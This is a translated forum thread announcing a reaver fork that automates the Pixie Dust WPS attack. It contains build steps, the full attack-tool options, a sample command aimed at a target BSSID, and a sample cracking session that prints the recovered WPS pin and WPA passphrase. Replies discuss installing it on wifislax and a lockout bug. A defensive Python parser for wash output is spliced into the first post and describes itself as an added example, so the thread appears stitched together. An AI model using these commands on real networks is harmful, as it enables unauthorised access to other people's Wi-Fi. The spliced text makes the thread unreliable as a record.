Seguridad Wireless - Wifi
Operating systems => GNU/Linux zone => Linux applications and dictionaries => Message started by: t6_x on 16-04-2015, 10:54 (Thursday)
-
Hello
DataHead and I made modifications in reaver so that it does the pixiedust when testing a pin number and automates all the work
Here is our contribution
GitHub
https://github.com/t6x/reaver-wps-fork-t6x
Overview
reaver-wps-fork-t6x is a modification done from a fork of reaver (https://code.google.com/p/reaver-wps-fork/)
This modified version uses the attack Pixie Dust to find the correct pin number of wps
The attack used in this version was developed by Wiire (https://github.com/wiire/pixiewps)
Install Required Libraries and Tools
Libraries for reaver
sudo apt-get install libpcap-dev aircrack-ng sqlite3 libsqlite3-dev
Tools
You must have installed the pixiewps created by Wiire (https://github.com/wiire/pixiewps)
Compile and Install
Build Reaver
cd reaver-wps-fork-t6x-master
cd src
./configure
make
Install Reaver
sudo make install
Usage - Reaver
Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
mod by DataHead
Required Arguments:
-i, --interface=<wlan> Name of the monitor-mode interface to use
-b, --bssid=<mac> BSSID of the target AP
Optional Arguments:
-m, --mac=<mac> MAC of the host system
-e, --essid=<ssid> ESSID of the target AP
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
-o, --out-file=<file> Send output to a log file [stdout]
-s, --session=<file> Restore a previous session file
-C, --exec=<command> Execute the supplied command upon successful pin recovery
-D, --daemonize Daemonize reaver
-a, --auto Auto detect the best advanced options for the target AP
-f, --fixed Disable channel hopping
-5, --5ghz Use 5GHz 802.11 channels
-v, --verbose Display non-critical warnings (-vv for more)
-q, --quiet Only display critical messages
-K, --pixie-dust Test Pixie Dust [1] Basic(-S) [2] With E-Once(-S) [3] With PKR
-Z, --no-auto-pass Not run automatically reaver to get the password when the pixiewps retrieves the pin
-h, --help Show help
Advanced Options:
-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
-d, --delay=<seconds> Set the delay between pin attempts [1]
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
-g, --max-attempts=<num> Quit after num pin attempts
-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
-t, --timeout=<seconds> Set the receive timeout period [5]
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
-A, --no-associate Do not associate with the AP (association must be done by another application)
-N, --no-nacks Do not send NACK messages when out of order packets are received
-S, --dh-small Use small DH keys to improve crack speed
-L, --ignore-locks Ignore locked state reported by the target AP
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
-n, --nack Target AP always sends a NACK [Auto]
-w, --win7 Mimic a Windows 7 registrar [False]
-X, --exhaustive Set exhaustive mode from the beginning of the session [False]
-1, --p1-index Set initial array index for the first half of the pin [False]
-2, --p2-index Set initial array index for the second half of the pin [False]
-P, --pixiedust-loop Set Into PixieLoop mode ( doesnt send M4, and loops through to M3 [False]
Example:
reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv -K 1
Usage - wash
Wash v1.5.1 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
mod by DataHead
Required Arguments:
-i, --interface=<iface> Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files
Optional Arguments:
-c, --channel=<num> Channel to listen on [auto]
-o, --out-file=<file> Write data to file
-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
-D, --daemonize Daemonize wash
-C, --ignore-fcs Ignore frame checksum errors
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-P, --file-output-piped Output Piped x|y|z...
-g, --get-chipset Output Piped and tries to read the chipset with reaver
-h, --help Show help
Example:
wash -i mon0
Example
Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
[+] Switching mon0 to channel 1
[?] Restore previous session for A.:9.:D.:....:....:...? [n/Y] n
[+] Waiting for beacon from A.:9.:D.:....:....:...
[+] Associated with A.:9.:D.:....:....:.... (ESSID: ......)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: c6:66:a6:72:37:6d:......
[P] PKE: 10:cf:cc:88:99:4b:15:de:a6:b3:26:fe:93:24:......
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[P] WPS Model Serial Number: A978FD123BC
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:......
[P] AuthKey: bf:68:34:b5:ce:e2:a1:24:dc:15:01:1c:78:9e:74:......
[+] Sending M2 message
[P] E-Hash1: 2e:d5:17:16:36:b8:c2:bb:d1:14:7c:18:cf:89:58:b8:1d:9d:39:......
[P] E-Hash2: 94:fb:41:53:55:b3:8e:1c:fe:2b:a3:9b:b5:82:11:......
[Pixie-Dust]
[Pixie-Dust] [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [*] PSK1: dd:09:bd:24:......
[Pixie-Dust] [*] PSK2: 77:e0:dd:00:......
[Pixie-Dust] [+] WPS pin: 9178....
[Pixie-Dust]
[Pixie-Dust] [*] Time taken: 0 s
[Pixie-Dust]
Running the reaver with the correct pin wait ...
[Reaver Test] BSSID: A.:9.:D.:3.:..:..
[Reaver Test] Channel: 1
[Reaver Test] [+] WPS PIN: '9178....'
[Reaver Test] [+] WPA PSK: '112233'
[Reaver Test] [+] AP SSID: '....'
# wash -i mon0 -g -c 2
XX:XX:XX:XX:XX:XX| 1|-68|1.0|No |AAA| D-Link| DIR-615
XX:XX:XX:XX:XX:XX| 1|-58|1.0|No |CCC| ASUSTeK Computer Inc.| RT-N56U
Any problem or suggestion please contact me
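The piped wash output shown above (the `wash -i mon0 -g -c 2` lines) is easy to turn into a WPS inventory for your own access points, so that any AP still advertising WPS unlocked can be found and have WPS disabled. This is an added example, not code from the post or from the reaver fork; the field order (BSSID, channel, RSSI, WPS version, locked, ESSID, manufacturer, model) is inferred from the two sample lines, and the extra rows are constructed.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample modelled on the `wash -g` piped lines in the post.
# The field order is an assumption taken from those two lines, not the
# tool's documented format; the last two rows are made up for the demo.
SAMPLE_WASH_OUTPUT = """\
XX:XX:XX:XX:XX:XX| 1|-68|1.0|No |AAA| D-Link| DIR-615
XX:XX:XX:XX:XX:XX| 1|-58|1.0|No |CCC| ASUSTeK Computer Inc.| RT-N56U
02:00:00:00:00:03| 6|-71|2.0|Yes|Guest| ExampleVendor| ModelX
02:00:00:00:00:04|11|-80|2.0|No |Office| ExampleVendor| ModelY
"""

@dataclass
class WashEntry:
    bssid: str
    channel: int
    rssi: int
    wps_version: str
    locked: bool
    essid: str
    manufacturer: Optional[str]
    model: Optional[str]

def parse_wash_line(line: str) -> Optional[WashEntry]:
    """Parse one pipe-separated wash line; return None for lines that do not fit."""
    fields = [f.strip() for f in line.rstrip("\n").split("|")]
    if len(fields) < 6 or not re.fullmatch(r"(?:[0-9A-Fa-fX]{2}:){5}[0-9A-Fa-fX]{2}", fields[0]):
        return None
    try:
        channel, rssi = int(fields[1]), int(fields[2])
    except ValueError:
        return None
    return WashEntry(
        bssid=fields[0], channel=channel, rssi=rssi, wps_version=fields[3],
        locked=fields[4].lower() == "yes", essid=fields[5],
        manufacturer=fields[6] if len(fields) > 6 else None,  # present with -g
        model=fields[7] if len(fields) > 7 else None,
    )

def parse_wash_output(text: str) -> List[WashEntry]:
    """Parse a whole capture of piped wash output, skipping unparsable lines."""
    return [e for e in (parse_wash_line(l) for l in text.splitlines()) if e]

def wps_exposed(entries: List[WashEntry]) -> List[WashEntry]:
    """APs advertising WPS that are not in the locked state: candidates for disabling WPS."""
    return [e for e in entries if not e.locked]
```

`wps_exposed(parse_wash_output(SAMPLE_WASH_OUTPUT))` returns the three unlocked entries (AAA, CCC, Office); the locked Guest AP is left out.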
-
Thank you very much for the implementation.
Regards
-
thanks for sharing
I downloaded the master and the modified reaver, and when I launch it, it runs and collects data but doesn't stop! I imagine I have to stop the capture, save the capture, and it will be read with the master in another console
to install the libs
sudo apt-get install libpcap-dev aircrack-ng sqlite3 libsqlite3-dev
I get "apt-get install: command not recognized"
How would it be done in wifislax? Can anyone tell me? Does wifislax already have the libs installed?
As I said, reaver collected data anyway without the libs
regards
-
apt-get is Debian's package manager; for wifislax it's slapt-get
slapt-get --update
slapt-get -i libpcap-dev aircrack-ng sqlite3 libsqlite3-dev
you also have gslapt and slpkg in case the packages aren't in slapt-get, but the ones you mention I think wifislax already includes ;) ;) ;) ;) ;)
-
thanks for clearing things up a bit for me
I think you're right that wifislax must have the libs, because I launch it and it collects data
the clarifications about slapt-get are very useful to me
"You have gslapt and slpkg in case in slapt-get ....." I didn't know that; that's what's cool, calling it from the console, installing the dependencies and running it ;D
thanks friend, regards
-
A problem here
with a simple argument
reaver -i mon0 -c 1 -b XX:XX:XX:XX:XX:XX -p 12345670 -g 1 -n -vv
With this syntax I expect a stop after 1 attempt (-g 1)
the pin is incorrect, ...and after one try PARTY NON STOP ...
repeating, repeating, repeating ...AP BLOCKED
why no stop after 1 attempt?
original reaver works perfectly with this syntax and arguments....stops after one try
if the pin is correct, win; if not, stop with only 1 attempt ... because 3 attempts cause AP BLOCKED.
want this working as expected, please.
-
they've already fixed that bug; your name appears
Some ideas formulated by nuroo, kcdtv
- Bug fixes done by alxchk, flatr0ze
+ Bug fixes done by alxchk, flatr0ze, USUARIONUEVO
#Special Thanks
Soxrok2212 for all the work done to help in the development of tools
-
they've already fixed that bug; your name appears
Some ideas formulated by nuroo, kcdtv
- Bug fixes done by alxchk, flatr0ze
+ Bug fixes done by alxchk, flatr0ze, USUARIONUEVO
#Special Thanks
Soxrok2212 for all the work done to help in the development of tools
I contacted him; in the end it was a small problem to sort out ;) >:(